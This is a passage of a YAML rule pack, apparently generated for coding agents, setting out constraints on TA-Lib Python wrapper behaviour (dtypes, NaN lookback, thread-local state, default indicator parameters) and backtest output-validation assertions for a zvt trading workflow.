    when: When implementing series_wrapper that returns polars Series to user_code
    action: wrap numpy results in polars Series without explicit index (polars has no built-in index)
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Incorrect data association when polars Series is created with misaligned data compared to expected row positions
  - id: finance-C-102
    when: When implementing c_wrapper that processes stream inputs from func_api
    action: return scalar values (float64) instead of arrays for streaming API calls
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: TypeError when stream result (scalar) is treated as array, or incorrect value extraction from single-element
      array
  - id: finance-C-103
    when: When implementing abstract_api that validates DataFrame input columns
    action: check that each required column names exist in the input DataFrame (not just that dict keys exist)
    severity: high
    kind: domain_rule
    modality: must
    consequence: KeyError raised when accessing missing DataFrame column, causing function to fail for valid dict inputs
  - id: finance-C-104
    when: When implementing or writing code that calls TA-Lib functions
    action: Pass input arrays with NPY_DOUBLE (float64) dtype — the Cython wrapper rejects non-float64 arrays at the boundary
    severity: high
    kind: domain_rule
    modality: must
    consequence: Input array type validation raises Exception('input array type is not double'), causing function calls to
      fail silently or throw unexpected errors
  - id: finance-C-106
    when: When implementing or writing code that passes arrays to TA-Lib functions
    action: Verify input arrays are C-contiguous — non-contiguous arrays are silently converted by calling PyArray_GETCONTIGUOUS
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Non-contiguous arrays trigger internal conversion overhead on every call, degrading performance especially
      for streaming/realtime use cases
  - id: finance-C-107
    when: When implementing or writing code that processes financial time series with missing values
    action: Assume TA-Lib NaN propagation behavior matches pandas rolling calculations — the underlying C library propagates
      NaN to end of output, unlike pandas which outputs values until lookback gap
    severity: high
    kind: resource_boundary
    modality: must_not
    consequence: NaN handling differences cause indicator values to differ from pandas-native rolling calculations, leading
      to incorrect strategy signals and financial loss
  - id: finance-C-108
    when: When implementing or writing code that processes financial time series with leading NaN values
    action: Expect the lookback period of each indicator to be filled with NaN — the wrapper pre-fills lookback positions
      with NaN to indicate insufficient data for calculation
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Misunderstanding lookback NaN handling leads to off-by-one errors in signal generation, causing premature
      or delayed trading decisions
  - id: finance-C-109
    when: When implementing or writing code using the Abstract API in multithreaded applications
    action: Rely on thread-local storage in the Function class — each thread gets isolated state via threading.local(), ensuring
      safe concurrent use without explicit locking
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without thread-local isolation, shared Function state causes race conditions where parameters from one thread
      corrupt calculations in another thread, producing incorrect indicator values
  - id: finance-C-110
    when: When implementing or writing code that mixes Polars and Pandas in the same TA-Lib function call
    action: Pass both Polars and Pandas objects to a single TA-Lib function — the wrapper explicitly raises Exception('Cannot
      mix polars and pandas') when both types are detected
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Mixed Polars/Pandas inputs trigger explicit Exception, halting execution and requiring refactoring of data
      pipeline
  - id: finance-C-111
    when: When implementing or writing code using the Abstract API's Function class __call__ method
    action: Expect parameter state to be restored after each call — the wrapper explicitly saves and restores opt_input values
      and input_names, ensuring stateless per-invocation behavior
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without state restoration, subsequent calls with different parameters would carry over unintended parameter
      values, producing incorrect calculations
  - id: finance-C-113
    when: When implementing or deploying TA-Lib in environments without C compilation toolchain
    action: Claim TA-Lib can run in pure Python environments without C compiler, NumPy, or the underlying TA-Lib C library
      — the wrapper is a Cython-based binding that requires compiled dependencies
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Users attempt installation in unsupported environments, experiencing build failures, missing symbol errors,
      or degraded functionality
  - id: finance-C-114
    when: When implementing or deploying TA-Lib in embedded systems or minimal Python environments
    action: Claim TA-Lib can run without NumPy — the Cython wrapper uses NumPy C API (np.import_array, PyArray_* functions)
      and converts each input to float64 ndarrays
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Users attempt deployment on NumPy-less platforms, encountering ImportError or AttributeError when calling
      any TA-Lib function
  - id: finance-C-116
    when: When comparing TA-Lib indicator calculations with pandas-native rolling calculations
    action: Claim TA-Lib produces identical results to pandas rolling calculations — NaN propagation behavior differs fundamentally
      between the C library and pandas implementation
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Users expect interchangeability between TA-Lib and pandas rolling functions, receiving unexpected NaN values
      that break downstream logic and cause incorrect calculations
  - id: finance-C-117
    when: When implementing or writing code that sets integer parameters in TA-Lib functions
    action: Use -2**31 (or equivalent TA_INTEGER_DEFAULT) for optional integer parameters that should use library defaults
      — this sentinel value maps to the C library's default behavior
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Omitting the -2**31 sentinel or using incorrect integer values causes the C library to use undefined parameter
      states, producing unpredictable indicator outputs
  - id: finance-C-118
    when: When implementing or writing code that processes output from TA-Lib functions
    action: Expect output type to match input type — DataFrame→DataFrame, Series→Series, ndarray→ndarray — the wrapper preserves
      container type through the calculation pipeline
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Incorrect expectations about output container type leads to type errors or incorrect data handling in downstream
      processing
  - id: finance-C-119
    when: When implementing or writing code that imports the TA-Lib Python package
    action: Rely on automatic TA-Lib C library initialization at import time — _ta_initialize() is called in talib/__init__.py
      at module load and _ta_shutdown() is registered via atexit for clean termination
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Attempting to call TA-Lib functions before import completes or after process shutdown causes undefined behavior
      or segmentation faults
  - id: finance-C-121
    when: When implementing integer parameter handling in TA-Lib Python bindings
    action: Map Python None or missing optional integers to TA_INTEGER_DEFAULT constant (-2^31) as defined by the TA-Lib C
      library; do not use arbitrary sentinel values like 0, -1, or Python None directly in C calculations
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using incorrect sentinel values causes the underlying C library to receive invalid parameters, producing
      wrong indicator values or silent data corruption that propagates to trading decisions
    derived_from_bd_id: BD-003
  - id: finance-C-122
    when: When calculating indicators that depend on dynamic lookback periods (e.g., SMA, EMA, RSI with varying timeperiod
      parameters)
    action: Verify lookback computation correctly accounts for endIdx as length-1 convention; verify the number of NaN values
      prepended matches the dynamic lookback derived from parameters (e.g., timeperiod=200 requires 199 prior bars lookback);
      validate output array length equals input length and valid results start at correct index
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Off-by-one errors in lookback calculation cause output arrays with wrong length, incorrect NaN count in lookback
      period, and valid results starting at wrong index; for high-period indicators like SMA(200), this propagates to significant
      data misalignment in backtesting and live trading
    derived_from_bd_id: BD-102
  - id: finance-C-123
    when: When processing input data arrays with NaN values or generating output arrays for TA-Lib indicators
    action: Pre-fill output arrays with NaN values for the lookback period before calculation; do not assume output arrays
      contain valid data for the first N elements where N equals the dynamic lookback period
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Using uninitialized output arrays or assuming valid values in the lookback period causes incorrect indicator
      values and silent data corruption that propagates to strategy calculations
    derived_from_bd_id: BD-085
  - id: finance-C-124
    when: When implementing candlestick pattern recognition in technical analysis
    action: Implement each 61 standard TA-Lib candlestick patterns (CDL* functions) covering both single-candle patterns (doji,
      hammer, engulfing) and multi-candle patterns (morning star, three white soldiers) — the complete taxonomy is mandatory
    severity: high
    kind: domain_rule
    modality: must
    consequence: Partial pattern implementation creates false claims of comprehensive technical analysis, as traders relying
      on missing patterns will have gaps in their automated strategy coverage compared to industry-standard TA-Lib
    derived_from_bd_id: BD-038
  - id: finance-C-125
    when: When implementing or refactoring concurrent execution of shared Function instances
    action: Use threading.local() for stateful computation buffers to isolate per-thread state; do NOT remove thread-local
      storage or replace with shared mutable state
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Removing thread-local storage causes data races when multiple threads share Function instances concurrently;
      computed indicators from one thread bleed into another, producing incorrect signals and corrupting backtest results
    derived_from_bd_id: BD-010
  - id: finance-C-126
    when: When using abstract API parameters 'price', 'price0', 'price1' etc. without explicit column specification
    action: Verify that __INPUT_PRICE_SERIES_DEFAULTS mapping (price->close, price0->high, price1->low, etc.) matches the
      actual DataFrame column names; if columns differ, explicitly specify the correct column name
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Relying on default mappings when DataFrame columns don't follow standard naming silently computes indicators
      on wrong price series, producing invalid trading signals that appear correct
    derived_from_bd_id: BD-012
  - id: finance-C-127
    when: When passing parameters to TA-Lib function wrappers
    action: Use Pythonic parameter names (e.g., timeperiod, high, low) when available; verify that camelCase C parameter names
      are correctly transformed to snake_case if using raw parameter dictionaries
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Using untransformed C parameter names like optInTimePeriod or inHigh causes TypeError exceptions or silently
      wrong parameter values, breaking indicator calculations in live strategies
    derived_from_bd_id: BD-020
  - id: finance-C-128
    when: When importing optional dependencies (pandas, polars) in the framework
    action: Use try/except ImportError with Python 2/3 compatible exception handling syntax to gracefully handle missing optional
      dependencies; do not let missing optional libraries prevent import of core functionality
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Missing optional dependencies cause ImportError exceptions that prevent the entire module from loading, blocking
      access to core TA-Lib functionality even when optional DataFrame features are not used
    derived_from_bd_id: BD-051
  - id: finance-C-129
    when: When integrating custom DataFrame implementations (non-pandas/polars) with the abstract API
    action: Subclass Function and override set_input_arrays to handle conversion from custom data types to numpy arrays; do
      not assume each data types are automatically supported
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Using custom DataFrame types without proper set_input_arrays override causes TypeError or incorrect array
      conversion, producing wrong indicator values that silently corrupt strategy logic
    derived_from_bd_id: BD-013
  - id: finance-C-130
    when: When initializing the framework in environments with missing pandas/polars
    action: Assume pandas or polars is installed at import time; use lazy detection (check availability only when calling
      DataFrame-dependent methods) to allow core functionality to work without optional dependencies
    severity: high
    kind: operational_lesson
    modality: must_not
    consequence: Eagerly importing optional dependencies causes immediate failure when neither pandas nor polars is installed,
      preventing use of core indicator calculation functions that don't require DataFrames
    derived_from_bd_id: BD-015
  - id: finance-C-131
    when: When implementing or modifying Python bindings for the TA-Lib C library
    action: Use Cython to generate Python C extensions for TA-Lib C library integration — maintain near-native performance
      and Python API ergonomics; do not replace with SWIG or other binding mechanisms
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Switching from Cython to SWIG introduces wrapper complexity, poorer numpy array integration, and potential
      memory access issues that could cause incorrect calculation results or performance degradation
    derived_from_bd_id: BD-022
  - id: finance-C-132
    when: When generating the Python API surface from source code
    action: Filter out TA_Set*, TA_Restore*, and other internal functions from generated code — include only public technical
      indicator functions to keep API surface clean and focused
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Including internal functions in the public API causes confusion, potential misuse of unverified functions,
      and API surface pollution that complicates documentation and user onboarding
    derived_from_bd_id: BD-021
  - id: finance-C-133
    when: When configuring adaptive indicators (KAMA, MAMA, etc.) in backtesting
    action: Explicitly call set_unstable_period() to configure convergence behavior based on parameter selection and risk
      tolerance — do not rely on framework defaults for adaptive indicators
    severity: high
    kind: domain_rule
    modality: must
    consequence: Failing to configure set_unstable_period causes convergence warnings to be suppressed silently, leading to
      incorrect indicator values that distort strategy logic and produce backtest results incompatible with live trading
    derived_from_bd_id: BD-029
  - id: finance-C-134
    when: When processing integer output arrays from pattern recognition and price transform functions
    action: Interpret lookback period positions as zero (0) rather than NaN in int32 output arrays — zero signals 'no valid
      pattern found' while non-zero values indicate 'pattern at position N'
    severity: high
    kind: domain_rule
    modality: must
    consequence: Misinterpreting zero as a valid pattern position causes incorrect pattern recognition results, leading to
      false trading signals that execute trades on non-existent patterns and produce unreproducible strategy behavior
    derived_from_bd_id: BD-034
  - id: finance-C-135
    when: When calling single-price technical indicator functions without explicit price input
    action: Default to 'close' price series for single-price functions (RSI, MACD, etc.) when no price input is specified
      — use Abstract API default inputs configuration for the close series
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using non-close prices as defaults causes indicators to calculate on the wrong price series, producing incorrect
      strategy signals that lead to trades at wrong times and significant financial losses
    derived_from_bd_id: BD-040
  - id: finance-C-136
    when: When implementing or migrating code that uses TA-Lib indicator functions
    action: Assume TA-Lib NaN handling behaves like pandas rolling operations — TA-Lib propagates NaN values to the end of
      output while pandas recovers after a window of valid values; handle NaN values explicitly at the end of series
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Assuming pandas-like NaN recovery causes silent result distortion where TA-Lib outputs NaN for the entire
      remaining series while pandas code expects recovery, leading to strategies that work in development but fail in production
    derived_from_bd_id: BD-090
  - id: finance-C-137
    when: When preparing input arrays for TA-Lib function calls
    action: Convert input arrays to float64 dtype (NPY_DOUBLE) and verify C-contiguous memory layout before passing to TA-Lib
      functions — use np.ascontiguousarray() if needed
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Passing non-double-precision or non-C-contiguous arrays causes silent type conversion at call time, adding
      memory copies and potential precision loss that distorts calculation results in ways that are difficult to debug
    derived_from_bd_id: BD-092
  - id: finance-C-138
    when: When implementing concurrent access to Abstract Function instances across multiple threads
    action: Use thread-local storage (threading.local()) to maintain independent state per thread — do not remove threading.local()
      usage or replace with shared state patterns that allow instances to be shared safely
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without thread-local storage, concurrent threads sharing Abstract Function instances experience race conditions
      where one thread's parameter state overwrites another's, causing silent data corruption in multi-strategy applications
    derived_from_bd_id: BD-053
  - id: finance-C-139
    when: When implementing lookback period calculation for moving average and similar indicators
    action: Compute lookback dynamically as timeperiod-1 per parameters — do not use hardcoded lookback values or fixed lookup
      tables that cannot capture parameter-dependent lookback
    severity: high
    kind: domain_rule
    modality: must
    consequence: Hardcoded lookback values produce incorrect indicator results for non-default timeperiods, causing strategies
      to use signals from incorrect historical windows and leading to trading losses
    derived_from_bd_id: BD-054
  - id: finance-C-140
    when: When implementing input parameter handling for Abstract API functions that accept DataFrames
    action: Support DataFrame column access by name using input_name parameters — do not change to positional-only argument
      handling that requires users to remember column order
    severity: high
    kind: domain_rule
    modality: must
    consequence: Switching to positional-only column access breaks existing user code that relies on named column specification,
      requiring widespread refactoring and causing breaking API changes
    derived_from_bd_id: BD-055
  - id: finance-C-141
    when: When implementing indicator function metadata and flags
    action: Expose TA_FUNC_FLAGS including the 'unstable period' flag for KAMA, MAMA, ADX, ATR indicators — do not remove
      or hide convergence period information that indicates when indicator results become reliable
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Hiding the unstable period flag causes strategies to use indicator results before convergence completes,
      producing unreliable signals during warmup periods that degrade strategy performance silently
    derived_from_bd_id: BD-056
  - id: finance-C-142
    when: When implementing data type conversion for input arrays before calling TA-Lib C library functions
    action: Convert pandas/polars Series to Float64 before calling TA-Lib C library — do not use Float32 for memory efficiency
      as it causes precision loss in price calculations
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using Float32 precision causes precision loss in financial price calculations, producing incorrect indicator
      values that lead to faulty trading signals and financial losses in live trading
    derived_from_bd_id: BD-057
  - id: finance-C-143
    when: When validating TA-Lib library installation completeness
    action: Verify that the function count matches the expected count to detect incomplete TA-Lib installations early — do
      not skip function count validation as it allows broken installations to go undetected
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Skipping function count validation allows incomplete TA-Lib installations to go undetected until specific
      functions are called, causing cryptic runtime errors during live trading when missing functions are accessed
    derived_from_bd_id: BD-078
  - id: finance-C-144
    when: When implementing __call__ method for Abstract Function class
    action: Restore parameter state (opt_input values, input_names) after each function call completes — do not allow per-call
      parameter changes to persist across invocations
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without parameter state restoration after each call, subsequent invocations inherit modified parameters from
      previous calls, causing silent parameter bleed where strategies use wrong indicator configurations
    derived_from_bd_id: BD-086
  - id: finance-C-145
    when: When designing thread-safe access patterns for shared Abstract Function instances across multiple threads
    action: Do not assume thread-local storage alone provides complete thread safety — deep copy of input data is required
      when sharing instances across threads to prevent data corruption from shared array access
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Relying only on thread-local storage while sharing input data causes subtle data corruption as threads may
      simultaneously read and write shared arrays, producing incorrect indicator values in concurrent multi-strategy applications
    derived_from_bd_id: BD-095
  - id: finance-C-146
    when: When configuring unstable periods using set_unstable_period() with thread-local Abstract Function instances
    action: Verify set_unstable_period() is called after thread-local isolation is established and before each thread's indicator
      calculations — do not configure unstable periods on shared state before threading operations begin
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Configuring unstable periods before thread-local isolation causes inconsistent convergence behavior across
      threads, with some threads using incorrect warmup periods and producing unreliable indicator values
    derived_from_bd_id: BD-099
  - id: finance-C-147
    when: When integrating TA-Lib functions into typed data pipelines where downstream code expects consistent DataFrame or
      Series output types
    action: Handle validation errors gracefully to preserve output type consistency — implement fallback or typed error responses
      instead of raising exceptions for length validation failures that break pipeline flow
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Validation failures raising exceptions breaks typed pipeline integration where downstream code expects consistent
      DataFrame or Series outputs, causing pipeline failures even for recoverable input errors
    derived_from_bd_id: BD-100
  - id: finance-C-148
    when: When modifying the TA-Lib initialization lifecycle
    action: Replace automatic initialization on import with lazy initialization — the C library must be initialized exactly
      once per process before any function calls
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Switching to lazy initialization shifts initialization costs to the first function call and may cause cryptic
      C-level errors if TA-Lib functions are called before the library is ready, breaking user expectations in backtesting
      workflows
    derived_from_bd_id: BD-023
  - id: finance-C-149
    when: When implementing TA-Lib wrapper functions
    action: Accept pandas.Series and polars.Series inputs directly, detect input types transparently, and extract arrays internally
      — raising clear errors for mixed input types
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without DataFrame input support, users must manually extract numpy arrays before each function call, introducing
      boilerplate and increasing the risk of type mismatch errors in quantitative research workflows
    derived_from_bd_id: BD-024
  - id: finance-C-150
    when: When processing input data before calling TA-Lib C functions
    action: Convert each input data to float64 numpy arrays with C-contiguous memory layout before passing to C functions
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using float32 or integer arrays causes memory misalignment with C ABI requirements, leading to segmentation
      faults or silent precision loss in technical indicator calculations
    derived_from_bd_id: BD-025
  - id: finance-C-151
    when: When implementing the TA-Lib Python API
    action: Provide both Function API (stateless) and Abstract API (stateful) interfaces, sharing the same underlying C implementation
      for correctness and performance
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Removing either the stateless or stateful API breaks existing user workflows — batch research relies on stateless
      calls while live trading relies on stateful streaming interfaces
    derived_from_bd_id: BD-032
  - id: finance-C-152
    when: When implementing or refactoring function name lookup logic in the TA-Lib Python wrapper
    action: Normalize each function names to uppercase internally while accepting any casing from users (case-insensitive
      lookup)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Breaking case-insensitive function name lookup causes existing code using 'rsi', 'RSI', or 'Rsi' to fail
      with function not found errors, making the wrapper incompatible with user expectations
    derived_from_bd_id: BD-042
  - id: finance-C-153
    when: When implementing output array initialization in the Python wrapper for technical indicator functions
    action: Use make_double_array() to pre-fill output arrays with NaN up to the lookback period, deferring sentinel value
      initialization to the wrapper layer
    severity: high
    kind: domain_rule
    modality: must
    consequence: Skipping NaN pre-fill causes lookback period to contain uninitialized garbage values instead of proper NaN
      sentinels, leading to incorrect calculations and silent data corruption in backtesting strategies
    derived_from_bd_id: BD-043
  - id: finance-C-154
    when: When implementing or adjusting technical indicator default parameters
    action: Change the default timeperiod=14 for RSI (Wilder's original) or timeperiod=30 for common MAs without explicit
      documentation — these defaults encode industry-standard conventions
    severity: medium
    kind: operational_lesson
    modality: must_not
    consequence: Modifying default timeperiod values causes strategies to use non-standard parameters that alter indicator
      responsiveness and smoothness, leading to backtest-live divergence when live trading uses broker defaults
    derived_from_bd_id: BD-046
  - id: finance-C-155
    when: When migrating pandas-based rolling statistics code to TA-Lib functions
    action: Verify that TA-Lib NaN propagation behavior matches strategy expectations — TA-Lib propagates NaN to end of series
      while pandas may recover after sufficient valid data in window
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Users expecting pandas-like NaN recovery after sufficient valid data will encounter unexpected NaN regions
      throughout the TA-Lib output series, causing silent calculation errors in strategies that rely on rolling statistics
      recovering from missing data
    derived_from_bd_id: BD-098
  - id: finance-C-156
    when: When using the Stochastic Oscillator indicator with default parameters
    action: Change the slowK default smoothing period from 3-period SMA without explicit testing and justification — the default
      minimizes signal noise while maintaining responsiveness for overbought/oversold detection
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Modifying the slowK default period alters the indicator's smoothing characteristics; a longer period increases
      lag and may miss timely entry/exit points while a shorter period increases noise and generates false trading signals
    derived_from_bd_id: BD-058
  - id: finance-C-157
    when: When using the Stochastic Oscillator indicator with default parameters
    action: Change the slowD default smoothing period from 3-period SMA without explicit testing and justification — the double-smoothing
      creates the signal line for buy/sell crossovers
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Modifying the slowD default period alters the crossover signal characteristics; changing to a shorter period
      increases false signals while a longer period increases lag in momentum trading decisions
    derived_from_bd_id: BD-059
  - id: finance-C-158
    when: When configuring Bollinger Bands with default parameters
    action: Change the default 20-period MA window or 2 standard deviation multiplier without explicit testing and justification
      — the multiplier of 2 captures approximately 95% of price action under normal distribution
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Modifying the standard deviation multiplier changes the volatility envelope width; 1.5x creates tighter bands
      causing more false mean reversion signals while 3.0x focuses only on extreme movements, missing valid trading opportunities
    derived_from_bd_id: BD-060
  - id: finance-C-159
    when: When configuring Stochastic RSI indicator with default parameters
    action: Change the default 14-period timeperiod without explicit testing and justification — the period aligns with traditional
      RSI conventions for a two-week trading cycle
    severity: medium
    kind: operational_lesson
    modality: should_not
    consequence: Modifying the Stochastic RSI period changes momentum sensitivity; shorter periods increase responsiveness
      but also increase noise while longer periods smooth fluctuations and may delay valid signals in momentum-based strategies
    derived_from_bd_id: BD-061
  - id: finance-C-160
    when: When implementing or refactoring Abstract Function classes that maintain internal state
    action: Use threading.local() for per-thread state isolation — each thread must maintain independent state arrays without
      sharing or locking
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without threading.local() isolation, concurrent threads sharing Abstract Function state will cause race conditions
      on internal state arrays, producing incorrect indicator values and non-deterministic backtest results
    derived_from_bd_id: BD-033
  - id: finance-C-161
    when: When implementing indicator functions for real-time trading scenarios
    action: Provide streaming versions (stream_*) of each function that support incremental O(1) per-tick updates — do not
      rely solely on batch processing that requires O(n) full recalculation on each new bar
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without streaming variants, real-time trading systems face O(n) recalculation cost per tick, causing unacceptable
      latency spikes that make low-latency strategy execution impossible
    derived_from_bd_id: BD-035
  - id: finance-C-162
    when: When validating input arrays before passing to low-level indicator calculations
    action: Validate that input arrays are float64 dtype and C-contiguous memory layout before processing — reject non-compliant
      inputs with clear Python error messages
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without float64 and C-contiguous validation, invalid inputs reach C-level libraries causing segmentation
      faults or undefined behavior with cryptic stack traces instead of actionable error messages
    derived_from_bd_id: BD-036
  - id: finance-C-163
    when: When processing DataFrame inputs in calculation functions
    action: Raise an explicit exception when polars and pandas DataFrames are mixed in the same calculation — do not allow
      implicit conversion between DataFrame types
    severity: high
    kind: domain_rule
    modality: must
    consequence: Without explicit exception handling, mixing polars and pandas inputs produces ambiguous results due to different
      index semantics and type systems, leading to silent data corruption in calculation outputs
    derived_from_bd_id: BD-037
  - id: finance-C-164
    when: When implementing MAVP (Moving Average Variable Period) calculations with invalid period values
    action: Use default SMA timeperiod values as fallback when periods exceed valid ranges — must not raise exceptions or
      change to other fallback behaviors
    severity: high
    kind: domain_rule
    modality: must
    consequence: Changing the fallback behavior from default SMA timeperiod to exceptions breaks existing code that relies
      on graceful degradation, causing silent failures in variable-period moving average calculations
    derived_from_bd_id: BD-063
  - id: finance-C-165
    when: When using STOCHRSI (Stochastic RSI) indicator in momentum-based overbought/oversold analysis
    action: Use the default RSI and Stochastic parameters that align with traditional technical analysis conventions — must
      not use non-standard parameter values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Using non-standard STOCHRSI parameters causes the indicator to produce momentum signals that deviate from
      market conventions, making comparison with other traders' analysis unreliable and potentially causing incorrect trading
      decisions
    derived_from_bd_id: BD-067
  - id: finance-C-166
    when: When configuring TA-Lib compatibility mode for indicator calculations
    action: Set compatibility mode to 0 (default TA-Lib calculation behavior) — must not set to mode 1 or other alternative
      calculation methods
    severity: high
    kind: domain_rule
    modality: must
    consequence: Setting compatibility mode to non-zero values causes TA-Lib functions to produce slightly different results
      for edge cases, breaking consistency with standard TA-Lib behavior and causing backtest-live discrepancies
    derived_from_bd_id: BD-070
  - id: finance-C-167
    when: When calculating Bollinger Bands (BBANDS) for trend visualization and signal generation
    action: Verify that BBANDS uses default parameters of 20-period MA and 2 standard deviations — these standard values verify
      cross-platform comparison consistency
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Using non-standard Bollinger Band parameters makes comparison with other traders' analysis difficult and
      reduces the indicator's utility as a market-standard tool, potentially causing misalignment in trading strategies
    derived_from_bd_id: BD-075
  - id: finance-C-168
    when: When implementing Three Black Crows (CDL3BLACKCROWS) candlestick pattern detection for bearish reversal signals
    action: Use the specific price relationship thresholds defined by the pattern detection logic — must not adjust thresholds
      to be more stringent or looser without explicit user configuration
    severity: high
    kind: domain_rule
    modality: must
    consequence: Altering CDL3BLACKCROWS detection thresholds changes the timing and frequency of bearish reversal signals,
      causing strategies to either miss valid reversal patterns or generate excessive false signals
    derived_from_bd_id: BD-076
  - id: finance-C-169
    when: When implementing parameter validation for wrapper functions that accept numeric arguments
    action: Raise TypeError immediately for type mismatches when float values are passed to integer parameters (e.g., 14.5
      for timeperiod=14) — do not silently truncate or coerce values
    severity: high
    kind: domain_rule
    modality: must
    consequence: Silent type coercion changes user intent without warning, causing subtle calculation errors in RSI, moving
      averages, and other indicator computations that are difficult to trace in production
    derived_from_bd_id: BD-047
  - id: finance-C-170
    when: When implementing wrapper functions that delegate to C/Cython implementations
    action: Use @wraps decorator or equivalent mechanism to preserve function metadata (name, docstring, annotations) from
      the underlying implementation
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without metadata preservation, function introspection, documentation generation, and IDE autocompletion fail,
      breaking Python tooling expectations and reducing developer productivity
    derived_from_bd_id: BD-049
  - id: finance-C-171
    when: When handling return values from wrapper functions that support both batch and streaming modes
    action: Detect streaming results by checking if the first result lacks __len__ attribute — use duck-typing to distinguish
      single scalar values from arrays/Series
    severity: high
    kind: domain_rule
    modality: must
    consequence: Incorrect type detection causes TypeError or silent data corruption when streaming scalar values are incorrectly
      treated as batch arrays or vice versa in downstream processing
    derived_from_bd_id: BD-050
  - id: finance-C-174
    when: When implementing the DataFrame input path for TA-Lib function calls
    action: Explicitly detect non-NPY_DOUBLE or non-C-contiguous arrays before calling C functions; if conversion is required,
      document the O(n) performance cost and warn users in high-frequency trading scenarios
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Without explicit detection and warning, the multi-step DataFrame conversion (extract ndarray, convert to
      float64, make C-contiguous) creates hidden O(n) performance cost that causes unpredictable latency spikes in high-frequency
      trading with large arrays
    derived_from_bd_id: BD-097
  - id: finance-C-175
    when: When auditing coverage and maintaining mutual exclusion constraints between polars and pandas
    action: Consolidate BD-016 and BD-037 into a single canonical business decision to eliminate redundant maintenance risk;
      define scope unambiguously (single call vs session-level)
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Redundant constraints with ambiguous scope create maintenance risk where exception messages or behavior may
      diverge between two BDs, causing inconsistent enforcement of mutual exclusion rules
    derived_from_bd_id: BD-101
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
